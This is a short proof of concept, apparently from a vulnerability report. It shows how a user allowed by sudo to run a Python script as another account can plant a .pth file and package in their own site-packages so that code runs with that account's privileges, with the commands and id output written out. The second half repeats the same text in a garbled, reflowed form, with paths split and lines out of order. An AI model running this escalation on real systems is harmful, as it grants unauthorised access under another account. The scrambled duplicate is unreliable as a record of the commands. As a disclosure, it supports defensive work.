Proof of concept:
/etc/sudoers contains:
%dns_simon ALL=(dns_zonefiles) NOPASSWD: /home/dns/zonefiles/bin/dns-reload simon
Prepare python code to run automatically as the calling user:
$ mkdir -p "$HOME/.local/lib/python3.5/site-packages/exploit"
$ echo "import subprocess" > "$HOME/.local/lib/python3.5/site-packages/exploit/__init__.py"
$ echo "subprocess.run(['id'])" >> "$HOME/.local/lib/python3.5/site-packages/exploit/__init__.py"
$ echo "import exploit" > "$HOME/.local/lib/python3.5/site-packages/exploit.pth"
Calling user credentials:
$ id
uid=1001(simon) gid=1001(simon) groups=1001(simon),100(users),1007(dns_simon)
Exploit script executing as called user credentials:
$ sudo -u dns_zonefiles /home/dns/zonefiles/bin/dns-reload simon
uid=999(dns_zonefiles) gid=995(dns_zonefiles) groups=995(dns_zonefiles)
Without the Ubuntu patch:
$ sudo -u dns_zonefiles /home/dns/zonefiles/bin/dns-reload simon
Processing example.com...
Proof of concept: zonefiles/ bin/dns- reload simon
/etc/sudoers contains:
%dns_simon ALL=(dns_zonefiles) NOPASSWD: /home/dns/
Prepare python code to run automatically as the calling user: .local/ lib/python3. 5/site- packages/ exploit" .local/ lib/python3. 5/site- packages/ exploit/ __init_ _.py" run(['id' ])" >> "$HOME/ .local/ lib/python3. 5/site- packages/ exploit/ __init_ _.py" .local/ lib/python3. 5/site- packages/ exploit. pth"
$ mkdir -p "$HOME/
$ echo "import subprocess" > "$HOME/
$ echo "subprocess.
$ echo "import exploit" > "$HOME/
Calling user credentials: 1001(simon) ,100(users) ,1007(dns_ simon)
$ id
uid=1001(simon) gid=1001(simon) groups=
Exploit script executing as called user credentials: zonefiles/ bin/dns- reload simon dns_zonefiles) gid=995( dns_zonefiles) groups= 995(dns_ zonefiles)
$ sudo -u dns_zonefiles /home/dns/
uid=999(
Without the Ubuntu patch: zonefiles/ bin/dns- reload simon
$ sudo -u dns_zonefiles /home/dns/
Processing example.com...